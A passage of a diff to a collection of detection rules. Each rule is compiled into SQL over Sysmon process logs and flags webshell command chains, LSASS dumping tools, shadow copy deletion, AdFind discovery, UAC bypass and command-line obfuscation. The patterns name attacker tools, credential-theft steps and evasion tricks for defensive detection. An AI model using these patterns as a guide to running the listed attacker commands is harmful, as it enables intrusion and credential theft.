used by Htran or Htran-like tools (e.g. NATBypass)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells", + "author": "Florian Roth (Nextron Systems), MSTI (query)", "tags": [ - "attack.command_and_control", - "attack.t1090", - "attack.s0040" + "attack.persistence", + "attack.t1505.003", + "attack.t1018", + "attack.t1033", + "attack.t1087" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\htran.exe' ESCAPE '\\' OR Image LIKE '%\\\\lcx.exe' ESCAPE '\\') OR (CommandLine LIKE '%.exe -tran %' ESCAPE '\\' OR CommandLine LIKE '%.exe -slave %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\') AND (CommandLine LIKE '%&ipconfig&echo%' ESCAPE '\\' OR CommandLine LIKE '%&quser&echo%' ESCAPE '\\' OR CommandLine LIKE '%&whoami&echo%' ESCAPE '\\' OR CommandLine LIKE '%&c:&echo%' ESCAPE '\\' OR CommandLine LIKE '%&cd&echo%' ESCAPE '\\' OR CommandLine LIKE '%&dir&echo%' ESCAPE '\\' OR CommandLine LIKE '%&echo [E]%' ESCAPE '\\' OR CommandLine LIKE '%&echo [S]%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_htran_or_natbypass.yml" + "filename": "proc_creation_win_webshell_chopper.yml" }, { - "title": "Potential Recon Activity Using DriverQuery.EXE", - "id": "9fc3072c-dc8f-4bf7-b231-18950000fadd", - "status": "experimental", - "description": "Detect usage of the \"driverquery\" utility to perform reconnaissance on installed drivers", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Findstr Launching .lnk File", + "id": "33339be3-148b-4e16-af56-ad16ec6c7e7b", + "status": "test", + "description": "Detects usage of findstr to identify and execute a lnk file as seen 
within the HHS redirect attack", + "author": "Trent Liffick", "tags": [ - "attack.discovery" + "attack.defense_evasion", + "attack.t1036", + "attack.t1202", + "attack.t1027.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%driverquery.exe' ESCAPE '\\' OR OriginalFileName = 'drvqry.exe') AND ((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '%.lnk' ESCAPE '\\')" ], - "filename": "proc_creation_win_driverquery_recon.yml" + "filename": "proc_creation_win_findstr_lnk.yml" }, { - "title": "Powershell Inline Execution From A File", - "id": "ee218c12-627a-4d27-9e30-d6fb2fe22ed2", + "title": "Reg Add Suspicious Paths", + "id": "b7e2a8d4-74bb-4b78-adc9-3f92af2d4829", "status": "experimental", - "description": "Detects inline execution of PowerShell code from a file", - "author": "frack113", + "description": "Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys", + "author": "frack113, Nasreddine Bencherchali", + "tags": [ + "attack.defense_evasion", + "attack.t1112", + "attack.t1562.001" + ], "falsepositives": [ - "Unknown" + "Rare legitimate add to registry via cli (to these locations)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM 
logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%iex %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Command %' ESCAPE '\\' OR CommandLine LIKE '%icm %' ESCAPE '\\') AND (CommandLine LIKE '%cat %' ESCAPE '\\' OR CommandLine LIKE '%get-content %' ESCAPE '\\' OR CommandLine LIKE '%type %' ESCAPE '\\') AND CommandLine LIKE '% -raw%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%\\\\AppDataLow\\\\Software\\\\Microsoft\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\OOBE%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\Currentversion\\\\Winlogon%' ESCAPE '\\' OR CommandLine LIKE '%\\\\CurrentControlSet\\\\Control\\\\SecurityProviders\\\\WDigest%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_exec_data_file.yml" + "filename": "proc_creation_win_reg_susp_paths.yml" }, { - "title": "Renamed PsExec Service Execution", - "id": "51ae86a2-e2e1-4097-ad85-c46cb6851de4", + "title": "Potential Exploitation Attempt Of Undocumented WindowsServer RCE", + "id": "6d5b8176-d87d-4402-8af4-53aee9db7b5d", "status": "experimental", - "description": "Detects suspicious launch of a renamed version of the PSEXESVC service with, which is not often used by legitimate administrators", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.execution" - ], + "description": "Detects potential exploitation attempt of undocumented Windows Server Pre Auth Remote Code Execution (RCE)", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", 
"falsepositives": [ - "Legitimate administrative tasks" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'psexesvc.exe' AND NOT (Image LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k DHCPServer%' ESCAPE '\\' AND CommandLine LIKE '%-k DHCPServer%' ESCAPE '\\' AND (User LIKE '%NETWORK SERVICE%' ESCAPE '\\' OR User LIKE '%NETZWERKDIENST%' ESCAPE '\\' OR User LIKE '%SERVIZIO DI RETE%' ESCAPE '\\' OR User LIKE '%SERVICIO DE RED%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_sysinternals_psexec_service.yml" + "filename": "proc_creation_win_exploit_other_win_server_undocumented_rce.yml" }, { - "title": "Regsvr32 Command Line Without DLL", - "id": "50919691-7302-437f-8e10-1fe088afa145", - "status": "test", - "description": "Detects a regsvr.exe execution that doesn't contain a DLL in the command line", - "author": "Florian Roth (Nextron Systems)", + "title": "Logged-On User Password Change Via Ksetup.EXE", + "id": "c9783e20-4793-4164-ba96-d9ee483992c4", + "status": "experimental", + "description": "Detects password change for the logged-on user's via \"ksetup.exe\"", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574", "attack.execution" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.ocx%' ESCAPE '\\' OR CommandLine LIKE '%.cpl%' ESCAPE '\\' OR CommandLine LIKE '%.ax%' ESCAPE '\\' OR CommandLine LIKE '%.bav%' 
ESCAPE '\\' OR CommandLine LIKE '%.ppl%' ESCAPE '\\'))) AND NOT (CommandLine = '')) AND NOT (CommandLine = ''))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ksetup.exe' ESCAPE '\\' OR OriginalFileName = 'ksetup.exe') AND CommandLine LIKE '% /ChangePassword %' ESCAPE '\\')" ], - "filename": "proc_creation_win_regsvr32_no_dll.yml" + "filename": "proc_creation_win_ksetup_password_change_user.yml" }, { - "title": "SyncAppvPublishingServer Execute Arbitrary PowerShell Code", - "id": "fbd7c32d-db2a-4418-b92c-566eb8911133", + "title": "Suspicious Greedy Compression Using Rar.EXE", + "id": "afe52666-401e-4a02-b4ff-5d128990b8cb", "status": "experimental", - "description": "Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe.", - "author": "frack113", + "description": "Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes", + "author": "X__Junior (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "App-V clients" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SyncAppvPublishingServer.exe' ESCAPE '\\' OR OriginalFileName = 'syncappvpublishingserver.exe') AND CommandLine LIKE '%\"n; %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rar.exe' ESCAPE '\\' OR Description = 'Command line RAR' OR (CommandLine LIKE '%.exe a %' ESCAPE '\\' OR CommandLine LIKE '% a -m%' ESCAPE '\\')) AND (CommandLine LIKE '% -hp%' ESCAPE '\\' AND CommandLine LIKE '% -r %' ESCAPE '\\' AND (CommandLine LIKE '% C:\\\\\\*.%' ESCAPE '\\' OR CommandLine LIKE '% 
C:\\\\\\\\\\*.%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '% \\%public\\%%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\$Recycle.bin\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml" + "filename": "proc_creation_win_rar_susp_greedy_compression.yml" }, { - "title": "Shadow Copies Deletion Using Operating Systems Utilities", - "id": "c947b146-0abc-4c87-9c64-b17e9d7274a2", - "status": "stable", - "description": "Shadow Copies deletion using operating systems utilities", - "author": "Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)", + "title": "UAC Bypass Using Windows Media Player - Process", + "id": "0058b9e5-bcd7-40d4-9205-95ca5a16d7b2", + "status": "test", + "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.impact", - "attack.t1070", - "attack.t1490" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason", - "LANDesk LDClient Ivanti-PSModule (PS EncodedCommand)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\diskshadow.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'wmic.exe', 'VSSADMIN.EXE', 'diskshadow.exe')) AND (CommandLine 
LIKE '%shadow%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\')) OR ((Image LIKE '%\\\\wbadmin.exe' ESCAPE '\\' OR OriginalFileName = 'WBADMIN.EXE') AND (CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%catalog%' ESCAPE '\\' AND CommandLine LIKE '%quiet%' ESCAPE '\\'))) OR ((Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR OriginalFileName = 'VSSADMIN.EXE') AND (CommandLine LIKE '%resize%' ESCAPE '\\' AND CommandLine LIKE '%shadowstorage%' ESCAPE '\\' AND (CommandLine LIKE '%unbounded%' ESCAPE '\\' OR CommandLine LIKE '%/MaxSize=%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE 'C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System')) OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\mmc.exe\" \"C:\\\\Windows\\\\system32\\\\eventvwr.msc\" /s' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))))" ], - "filename": "proc_creation_win_susp_shadow_copies_deletion.yml" + "filename": "proc_creation_win_uac_bypass_wmp.yml" }, { - "title": "DumpMinitool Usage", - "id": "dee0a7a3-f200-4112-a99b-952196d81e42", + "title": "HackTool - Inveigh Execution", + "id": "b99a1518-1ad5-4f65-bc95-1ffff97a8fd0", "status": "experimental", - "description": "Detects the use of \"DumpMinitool.exe\" a tool bundled with Visual Studio and DotNTET", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036", + "attack.credential_access", "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Very unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') 
AND ((Image LIKE '%\\\\DumpMinitool.exe' ESCAPE '\\' OR OriginalFileName = 'DumpMinitool.exe') OR (CommandLine LIKE '% --processId %' ESCAPE '\\' AND CommandLine LIKE '% --dumpType Full%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Inveigh.exe' ESCAPE '\\' OR (OriginalFileName LIKE '\\\\Inveigh.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\Inveigh.dll' ESCAPE '\\') OR Description = 'Inveigh' OR (CommandLine LIKE '% -SpooferIP%' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToIPs %' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToDomains %' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToMACs %' ESCAPE '\\' OR CommandLine LIKE '% -SnifferIP%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_dumpminitool_execution.yml" + "filename": "proc_creation_win_hktl_inveigh.yml" }, { - "title": "HackTool - SecurityXploded Execution", - "id": "7679d464-4f74-45e2-9e01-ac66c5eb041a", - "status": "stable", - "description": "Detects the execution of SecurityXploded Tools", + "title": "Renamed AdFind Execution", + "id": "df55196f-f105-44d3-a675-e9dfb6cc2f2b", + "status": "test", + "description": "Detects the use of a renamed Adfind.exe. AdFind continues to be seen across majority of breaches. 
It is used to domain trust discovery to plan out subsequent steps in the attack chain.", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1555" + "attack.discovery", + "attack.t1018", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Company = 'SecurityXploded' OR Image LIKE '%PasswordDump.exe' ESCAPE '\\' OR OriginalFileName LIKE '%PasswordDump.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%domainlist%' ESCAPE '\\' OR CommandLine LIKE '%trustdmp%' ESCAPE '\\' OR CommandLine LIKE '%dcmodes%' ESCAPE '\\' OR CommandLine LIKE '%adinfo%' ESCAPE '\\' OR CommandLine LIKE '% dclist %' ESCAPE '\\' OR CommandLine LIKE '%computer\\_pwdnotreqd%' ESCAPE '\\' OR CommandLine LIKE '%objectcategory=%' ESCAPE '\\' OR CommandLine LIKE '%-subnets -f%' ESCAPE '\\' OR CommandLine LIKE '%name=\"Domain Admins\"%' ESCAPE '\\' OR CommandLine LIKE '%-sc u:%' ESCAPE '\\' OR CommandLine LIKE '%domainncs%' ESCAPE '\\' OR CommandLine LIKE '%dompol%' ESCAPE '\\' OR CommandLine LIKE '% oudmp %' ESCAPE '\\' OR CommandLine LIKE '%subnetdmp%' ESCAPE '\\' OR CommandLine LIKE '%gpodmp%' ESCAPE '\\' OR CommandLine LIKE '%fspdmp%' ESCAPE '\\' OR CommandLine LIKE '%users\\_noexpire%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_active%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_pwdnotreqd%' ESCAPE '\\') OR Imphash IN ('bca5675746d13a1f246e2da3c2217492', '53e117a96057eaf19c41380d0e87f1c2') OR (Hashes LIKE '%IMPHASH=BCA5675746D13A1F246E2DA3C2217492%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=53E117A96057EAF19C41380D0E87F1C2%' ESCAPE '\\') OR OriginalFileName = 'AdFind.exe') AND NOT (Image LIKE '%\\\\AdFind.exe' ESCAPE '\\'))" ], - "filename": 
"proc_creation_win_hktl_secutyxploded.yml" + "filename": "proc_creation_win_renamed_adfind.yml" }, { - "title": "Abusing Print Executable", - "id": "bafac3d6-7de9-4dd9-8874-4a1194b493ed", - "status": "test", - "description": "Attackers can use print.exe for remote file copy", - "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative", - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], + "title": "Suspicious WERMGR Process Patterns", + "id": "396f6630-f3ac-44e3-bfc8-1b161bc00c4e", + "status": "experimental", + "description": "Detects suspicious Windows Error Reporting manager (wermgr.exe) process patterns - suspicious parents / children, execution folders, command lines etc.", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\print.exe' ESCAPE '\\' AND CommandLine LIKE 'print%' ESCAPE '\\' AND CommandLine LIKE '%/D%' ESCAPE '\\' AND CommandLine LIKE '%.exe%' ESCAPE '\\') AND NOT (CommandLine LIKE '%print.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND (Image LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR Image LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\netstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))))" ], - "filename": 
"proc_creation_win_print_remote_file_copy.yml" + "filename": "proc_creation_win_wermgr_susp_child_process.yml" }, { - "title": "Set Suspicious Files as System Files Using Attrib.EXE", - "id": "efec536f-72e8-4656-8960-5e85d091345b", - "status": "experimental", - "description": "Detects the usage of attrib with the \"+s\" option to set scripts or executables located in suspicious locations as system files to hide them from users and make them unable to be deleted with simple rights. The rule limits the search to specific extensions and directories to avoid FPs\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - CreateMiniDump Execution", + "id": "36d88494-1d43-4dc0-b3fa-35c8fea0ca9d", + "status": "test", + "description": "Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\attrib.exe' ESCAPE '\\' OR OriginalFileName = 'ATTRIB.EXE') AND CommandLine LIKE '% +s%' ESCAPE '\\' AND (CommandLine LIKE '% \\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.ps1%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\')) AND NOT (CommandLine LIKE 
'%\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\CreateMiniDump.exe' ESCAPE '\\' OR Imphash = '4a07f944a83e8a7c2525efa35dd30e2f' OR Hashes LIKE '%IMPHASH=4a07f944a83e8a7c2525efa35dd30e2f%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_attrib_system_susp_paths.yml" + "filename": "proc_creation_win_hktl_createminidump.yml" }, { - "title": "Use of PktMon.exe", - "id": "f956c7c1-0f60-4bc5-b7d7-b39ab3c08908", - "status": "test", - "description": "Tools to Capture Network Packets on the windows 10 with October 2018 Update or later.", - "author": "frack113", + "title": "Phishing Pattern ISO in Archive", + "id": "fcdf69e5-a3d3-452a-9724-26f2308bf2b1", + "status": "experimental", + "description": "Detects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1040" + "attack.initial_access", + "attack.t1566" ], "falsepositives": [ - "Legitimate use" + "Legitimate cases in which archives contain ISO or IMG files and the user opens the archive and the image via clicking and not extraction" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\pktmon.exe' ESCAPE '\\' OR OriginalFileName = 'PktMon.exe'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\Winrar.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\7zFM.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\peazip.exe' ESCAPE '\\') AND (Image LIKE '%\\\\isoburn.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\PowerISO.exe' ESCAPE '\\' OR Image LIKE '%\\\\ImgBurn.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_pktmon.yml" + "filename": "proc_creation_win_susp_archiver_iso_phishing.yml" }, { - "title": "CL_Mutexverifiers.ps1 Proxy Execution", - "id": "1e0e1a81-e79b-44bc-935b-ddb9c8006b3d", + "title": "Potential Dosfuscation Activity", + "id": "a77c1610-fc73-4019-8e29-0f51efc04a51", "status": "experimental", - "description": "Detects the use of a Microsoft signed script to execute commands", - "author": "oscd.community, Natalia Shornikova, frack113", + "description": "Detects possible payload obfuscation via the commandline", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1216" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\CL\\_Mutexverifiers.ps1%' ESCAPE '\\' AND CommandLine LIKE '%runAfterCancelProcess %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%^^%' ESCAPE '\\' OR CommandLine LIKE '%^|^%' ESCAPE '\\' OR CommandLine LIKE '%,;,%' ESCAPE '\\' OR CommandLine LIKE '%;;;;%' ESCAPE '\\' OR CommandLine LIKE '%;; ;;%' ESCAPE '\\' OR CommandLine LIKE '%(,(,%' ESCAPE '\\' OR CommandLine LIKE '%\\%COMSPEC:~%' ESCAPE '\\' OR CommandLine LIKE '% c^m^d%' ESCAPE '\\' OR CommandLine LIKE '%^c^m^d%' ESCAPE '\\' OR CommandLine LIKE '% c^md%' ESCAPE '\\' OR CommandLine LIKE '% cm^d%' ESCAPE '\\' OR CommandLine LIKE '%^cm^d%' ESCAPE '\\' OR CommandLine LIKE '% s^et %' ESCAPE '\\' OR CommandLine LIKE '% s^e^t %' ESCAPE '\\' OR CommandLine LIKE '% se^t %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_cl_mutexverifiers.yml" + "filename": "proc_creation_win_cmd_dosfuscation.yml" }, { - "title": "Regsvr32 Spawning Explorer", - 
"id": "6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca", - "status": "experimental", - "description": "Detects \"regsvr32.exe\" spawning \"explorer.exe\", which is very uncommon.", - "author": "elhoim", + "title": "Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call", + "id": "9c0295ce-d60d-40bd-bd74-84673b7592b1", + "status": "test", + "description": "Detects suspicious base64 encoded and obfuscated \"LOAD\" keyword used in .NET \"reflection.assembly\"", + "author": "pH-T (Nextron Systems)", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1218.010" + "attack.t1059.001", + "attack.t1027" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND Image LIKE '%\\\\explorer.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%OgA6ACgAIgBMACIAKwAiAG8AYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATAAiACsAIgBvAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAIgArACIAbwBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAIgBMAG8AIgArACIAYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATABvACIAKwAiAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAbwAiACsAIgBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAIgBMAG8AYQAiACsAIgBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATABvAGEAIgArACIAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAbwBhACIAKwAiAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMACcAKwAnAG8AYQBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATAAnACsAJwBvAGEAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAJwArACcAbwBhAGQAJwApA%' ESCAPE '\\' OR CommandLine 